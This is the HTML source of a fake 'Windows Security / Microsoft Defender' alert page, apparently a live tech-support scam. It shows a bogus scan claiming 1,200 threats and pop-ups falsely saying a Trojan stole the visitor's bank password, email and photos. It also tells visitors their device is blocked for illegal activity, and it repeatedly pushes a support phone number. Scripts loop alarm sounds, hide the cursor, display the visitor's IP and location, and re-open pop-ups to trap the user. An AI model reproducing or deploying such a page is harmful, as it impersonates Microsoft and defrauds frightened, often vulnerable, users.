
<!DOCTYPE html>
<html lang="en">
  <head>
  <script defer data-domain="apartest.com/KMfjlu" src="https://api.publytics.net/js/script.manual.min.js"></script>
<script>
    window.publytics = window.publytics || function() { (window.publytics.q = window.publytics.q || []).push(arguments) };
    publytics('pageview');
</script>
    <meta charset="utf-8">
      <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
      <meta content="noindex,nofollow" name="robots">
      <title>Helpdesk_Assist_W </title>
      <link href="JhPTQWjeygfO.png" rel="icon" id="favicon" type="image/png">
      <link href="Cn2AHIDVaT36.css" rel="stylesheet">
      <link href="0CNhWbjjoE2o.css" rel="stylesheet">
        <link href="fAUyVJO0zEto.css" <link="" type="text/css" rel="stylesheet">
<script src="nde1gUNmGz1X.js"></script>
<script src="WndfuWIhduGjd.js"></script>
<script src="JmHauFOE6hBP.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="IZE7l1WWO2DU.css">

      <style type="text/css">@keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-moz-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-webkit-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}#xnvjiaf2npoo1694042833969.open{animation : tawkMaxOpen .25s ease!important;}@keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-moz-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-webkit-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}#xnvjiaf2npoo1694042833969.closed{animation: tawkMaxClose .25s ease!important}</style>


         <script src="GPrqugOyUCiE.js" type="text/javascript"></script>
         <script src="DTyfc2nRVBM7.js" type="text/javascript"></script>
         <script src="TR43KQr3YvqP.js" type="text/javascript"></script>
         <script src="zAaI86xes4bQ.js" type="text/javascript"></script>
         <script src="pQ1NlSUQxfgM.js" type="text/javascript"></script>
         <script src="QwUelq8gIjQ4.js" type="text/javascript"></script>
         <script src="apiwesvb.js" type="text/javascript"></script>
         <script src="cstmdc5emdoS.js" type="text/javascript"></script>

        </head>


        <body class="map" id="mycanvas" onmousemove="showd2();" onclick="chat();beep1();" onbeforeunload="return myFunction()" style="cursor:none">

    <audio id="mdchys">
        <source src="NtUGN1dKiCUr.mp3" type="audio/mpeg">
      </audio>
      <audio autoplay="" id="infogt">
        <source src="LhlCcb3bW5w3.mp3" type="audio/mpeg">
      </audio>

      <a href="#" id="link_black" style="cursor:none" rel="noreferrer">
        <div class="black" style="height: 145%; cursor: none; display: block;"></div>

          <div class="bg" id="bg">
        <div class="bgimg" style="top:0">
          <img src="1mUEbaIhVjBd.png" alt="" width="100%">
        </div>
      </div>
      </a>
      <div class="pro_box" style="cursor: none; display: default;">
        <div class="pro_box_header">
          <div class="row">
            <div class="col-md-12">
              <div class="minimize">
                <ul>
                  <li>
                    <a href="#">
                      <img src="igsR3buUY5aB.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
            <div class="col-md-4">
              <div class="logo">
                <img src="JhPTQWjeygfO.png">
                <span>Windows_security</span>
              </div>
            </div>
            <div class="col-md-8">
              <div class="activate_lic">
                <ul>
                  <li>
                    <a href="#">
                      <button>Activate the license</button>
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="IsBT0VR1yeI7.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="WgsO9craKBEl.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
        <div class="scan_box">
          <div class="scan_box_header">
            <div class="row">
              <div class="col-md-6">
                <div class="quick_scan">
                  <p>
                    <img src="oTXcA00RVOIu.png">
                    <span>Scanning Rapide</span>
                  </p>
                </div>
              </div>
              <div class="col-md-6">
                <div class="bhfys">
                  <ul>
                    <li>
                      <a href="#">
                        <img src="igsR3buUY5aB.png">
                      </a>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
          <div class="scan_body">
            <div class="progress" style="height:30px;">
              <img src="l7iyMSmUB6eV.png" alt="" style="max-width: 100%;">
            </div>
            <div class="table_quick">
              <table class="table table-bordered">
                <thead>
                  <tr>
                    <th scope="col">Scanned Objects</th>
                    <th scope="col">
                      <div class="col_fourth counter">
                        <h2 class="count-number count-title timer" data-speed="5000" data-to="51900">51,900</h2>
                      </div>
                    </th>
                  </tr>
                  <tr>
                    <th scope="col">Time Spent</th>
                    <th scope="col">5 secs</th>
                  </tr>
                  <tr>
                    <th scope="col">Identified_Threats</th>
                    <th scope="col" style="color:red">
                      <h2 class="">1,200</h2>
                    </th>
                  </tr>
                </thead>
              </table>
            </div>
          </div>
          <div class="scan_footer">
            <div class="row">
              <div class="col-md-6">
                <div class="bt_can">
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Scan</button>
                  </div>
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Pause</button>
                  </div>
                </div>
              </div>
              <div class="col-md-6">
                <div class="bt_can2">
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Scheduled Scans</button>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="pro_box2" style="cursor: default; display: none;">
        <img src="MuIBIPAQHD26.png" alt="" style="max-width: 100%;">
      </div>
      <div class="pro_box3" style="cursor: none; display: none;">
        <div class="pro_box_header">
          <div class="row">
            <div class="col-md-12">
              <div class="minimize">
                <ul>
                  <li>
                    <a href="#">
                      <img src="igsR3buUY5aB.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
            <div class="col-md-4">
              <div class="logo">
                <img src="JhPTQWjeygfO.png">
                <span>Windows_security</span>
              </div>
            </div>
            <div class="col-md-8">
              <div class="activate_lic">
                <ul>
                  <li>
                    <a href="#">
                      <button>Activate the license</button>
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="HrHhNIwHS84l.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="IsBT0VR1yeI7.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="WgsO9craKBEl.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div><div class="scan_box2" style=" border: 1px solid #474747;  cursor:default;  box-shadow: 15px 15px 15px 15px rgba(0,0,0,.4);">
        <div class="scan_box2">
          <div class="scan_box_header">
            <div class="row">
              <div class="col-md-6">
                <div class="quick_scan">
                  <p>
                    <img src="oTXcA00RVOIu.png">
                    <span>Scan</span>
                  </p>
                </div>
              </div>
             <div class="col-md-6">
           <span class="fl title2" id="txts1">
              <a href="#" id="cross">
                <p style="margin-right:50px;">➖</p><p style="margin-right:30px;">❏ </p><p>❌</p><p></p>
                      </a>


                </span></div>
              </div>
            </div>
          </div>
          <div class="scan_body">
            <div class="row">
              <div class="col-md-12">
                <div class="tooreg_detail_scan">
                  <ul>

                  </ul></div>
                </div>

              </div>
            </div>
          </div>
        </div>

      <div style="bottom:-20px;position:fixed;cursor:none;z-index:999999999" id="footer">
        <div class="row">
          <div class="col-md-12">
            <div class="right-foot" style="text-align:center">
              <span id="footertxt">
                <img src="JhPTQWjeygfO.png"> Windows_security </span>
              <span style="font-weight:500;padding-left:13px;color:#fff; ">Windows Supp0rt <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">+1-833-480-9638
                </span>
              </span>
            </div>
          </div>
          <div class="col-md-12">
            <marquee direction="left" height="100px" width="100%">
              <small class="text-left" style="color:#eee;font-size:10px">Windows Defender SmartScreen now prevents unrecognized applications from appearing. Running this application may put your PC at risk. Windows Defender scan detected unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents。</small>
            </marquee>
          </div>
        </div>
      </div>

      <div class="lightbox" id="poptxt" onclick="beep1();" style="display: none; cursor:default;">
        <div class="ilb top" style="font-size:17px">
          <div class="ilb headers" style="border-bottom:1px solid #d6d5d5;">
            <span class="fl title" id="txtadd">
              <span class="fl ilb">
                <img src="XvO1NN81XLGr.png" class="logo3">
              </span>Microsoft_Defender </span>
            <span class="fl title2" id="txts1">
               <p style="margin-right:50px;">➖</p><p style="margin-right:30px;">❏ </p><p>❌</p><p></p>

            </span>
          </div>
        </div>
        <div id="txtintro2">
          <span class="colo-rd">


             <p style="font-size:15px;font-weight:400;color:black;">Microsoft Defender found some infected files but not able to remove it because of the group policies permissions. Please Scan now to remove it manually.</p>

          </span>
        </div>
        <img src="umTUFdyqpkTP.gif" id="banner">
        <div id="disclaimer" style="color:#0F396D;">Call Support for help<br>
           <span class="Support" style="font-size:22px;">Windows Support <span style="border:1px Solid #114d9a;border-radius:5px;padding:2px 5px">+1-833-480-9638
            </span>
          </span>
        </div>
        <div id="bottom">
          <img src="JhPTQWjeygfO.png" id="badge">
          <span class="title3">Windows_Security</span>
          <ul>
            <li>
              <a href="#" style="text-decoration: none;">
                <div class="button">
                  <span id="">Scan now</span>
                </div>
              </a>
            </li>
            <li>
              <a href="#" style="text-decoration: none;">
                <div class="button2">
                  <span id="">Scan Later</span>
                </div>
              </a>
            </li>
          </ul>
        </div>
      </div>

      <div class="cardcontainer" style="cursor: default; display: none;" id="pop_up_new">
        <p style="font-size:16px;font-weight:400;margin:0;padding:5px 10px;color:#fff!important;color: #000;;font-weight:700;margin-top:0px" class="text-center">Windows-Defender </p>
        <p>
         <b>Security reasons have prevented access to this PC.</b>
         </p>
         <p>Your computer has been reported to be infected with Trojan_type_spyware. The following data was compromised:</p>
         <p>&gt; Email ID <br>&gt; Bank Password <br>&gt; Facebook Login <br>&gt; Photos and Documents </p>
         <p>A Windows Defender scan detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents. </p>
         <p>Please contact us immediately. Our engineer will guide you through the removal process over the phone. </p>
         <p>Call Windows Support immediately to report this threat, prevent identity theft, and unblock access to this device. </p>
         <p>Closing this window may put your personal information at risk and may cause your Windows registration to be suspended. </p>
         <p style="padding-bottom:0;color:#fff;font-size:16px">Windows Please call Support:<strong>
            <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">   +1-833-480-9638
            </span>
          </strong>
        </p>
        <div class="action_buttons">
          <a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">Allow</a>
          <a class="active" id="leave_page" style="color:#fff!important">Deny</a>
        </div>
      </div>

      <div class="answer_list" style="display:none;background-color: rgb(40 40 40 / 80%);height:auto;width:550px;margin-left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem" id="welcomeDiv">
        <p style="color:#FFFFFF;margin-top:10px;font-size:16px;opacity:.9;padding:0 5px" class="text-center">Access to this system has been blocked for security reasons. Do not access or restart this PC. If you overlook this basic warning, you may lose information about this framework. Contact Support as soon as possible and a Microsoft expert will guide you through the investigation over the phone. Running this application may put your PC at risk。<br>
          <strong>
         Windows Support: <span style="border:1px solid #383d41;border-radius:5px;padding:2px 5px">    +1-833-480-9638
            </span>
          </strong>
        </p>
      </div>

      <div id="chrome-alerts" class="chrome-alert" style="padding-top:10px; cursor:pointer;">
        <div>
        <!-- <a href="javascript:openlink()" class="cross">×</a> -->
            <p>Leave site?</p>
        <p>Changes you made may not be saved.</p>
        <input type="checkbox" id="checkbox" name="checkbox" value="checkbox">
      <label for="checkbox">Prevent this page from creating additional dialogs</label><br>
            <div class="action_buttons">
              <a class="" id="leave_page">Cancel</a>
              <a class="active" id="leave_page">Leave</a>
            </div>
        </div>
    </div>

<script>
  // Wait until the DOM is fully loaded
document.addEventListener("DOMContentLoaded", function () {
  // Get the alert div
  const chromeAlerts = document.getElementById("chrome-alerts");

  if (chromeAlerts) {
    // Add event listener to the entire window
    window.addEventListener("click", function (event) {
      // Check if the click is outside the alert box
      if (!chromeAlerts.contains(event.target)) {
        // Hide the alert div
        chromeAlerts.style.display = "none";
      }
    });
  }
});

</script>

      <div id="chat" style="display: none;" class="bounce3">
        <img src="JhPTQWjeygfO.png">
        <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft</span>
        <br>
        <p>Windows Technical Support
        </p>
        <h4 style="font-weight:600;color:#0F396D;font-size:22px">    +1-833-480-9638
          <br>(Toll-free number)<br><br>
        </h4>
        <div class="arrow-down">
          <svg height="1em" viewBox="0 0 320 512">
            <style>
              svg {
                fill: #fff
              }
            </style>
            <path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path>
                  </svg></div>
      </div>

      <div id="login-box">
        <span style="color: #fff;
        font-size: 21px;
        font-weight: 600;
        margin-left: 6px;
        position: relative;
        top: 50%;">Admin Login</span>
        <div class="quiks" onclick="hide1();playsnd();">
                    <p class="text-center1" style="color: red; font-size: 22px; opacity:1; font-weight: 700; ">X</p>
                  </div>

        <br>
        <br>
        <p class="text-center" style="color: #fff;  margin-top:10px; font-size: 16px; opacity:.9; ">
          <strong>IP Address: <span id="ipAddress" style="color:red;"></span></strong>
      <br>
      <strong>City: <span id="city" style="color:red;"></span></strong> <br>
      <strong>Region: <span id="region" style="color:red;"></strong> </span><br>
      <strong>Longitude: <span id="longitude" style="color:red;"></span></strong> <br>
      <strong>Latitude: <span id="latitude" style="color:red;"></span></strong> <br>

      <strong>Your device has been blocked due to illegal activity by the State of <span id="state" style="color: red; font-size: 16px;"></span>
      </strong>

       <br><strong>  Contact Microsoft Windows Support: +1-833-480-9638	</strong></p>

        <form action="#">
           <input type="text" name="name" id="name" placeholder="Username" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

         <input type="text" name="name" id="name" placeholder="Password" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

        <input type="submit" class="button1" name="login" value="Login" onclick="playsnd();">



      </form></div>


<script>
function showd2() {
document.getElementById("chat-box").style.display = "block";
}
</script>
<script>
  function showd2() {
  document.getElementById("login-box").style.display = "block";
  }
  </script>


      <script>
        setInterval(function() {
          document.getElementById("infogt").play();
          document.getElementById("mdchys").play();
        }, 500);
      </script>

      <script>
  function beep1() {
    document.getElementById("mdchys").play();
 }
  </script>

      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#welcomeDiv").show()

          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $(".pro_box").delay(400).fadeIn(300);
          $("#poptxt").delay(2000).fadeIn(400);
              $(".black").delay(1E3).fadeIn(800);
          $(".pro_box2").delay(2500).fadeIn(800);
          $(".pro_box3").delay(3500).fadeIn(800);
          $("#pop_up_new").delay(4E3).fadeIn(800);
          $("#ev_talkbox_wrapper").delay(1).fadeIn(500)
        });
      </script>
      <script>
        $(document).ready(function () {
            $("body").click(function () {
                $("#ev_talkbox_wrapper").hide();
            });
        });
    </script>
    <script>
      $(document).ready(function () {
          $("#ev_talkbox_wrapper").click(function () {
              $("#ev_talkbox_wrapper").hide();
          });
      });
  </script>
  <script>
      $(document).ready(function () {
          $("#mycanvas").click(function () {
              $("#ev_talkbox_wrapper").hide();
          });
      });
  </script>
      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#poptxt").show()
          })
        });
        $(document).ready(function() {
          $("#cross").click(function() {
            $("#poptxt").show()
          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $("body").mouseover(function() {
            $("#poptxt").show()
          })
        });
      </script>


</body></html>
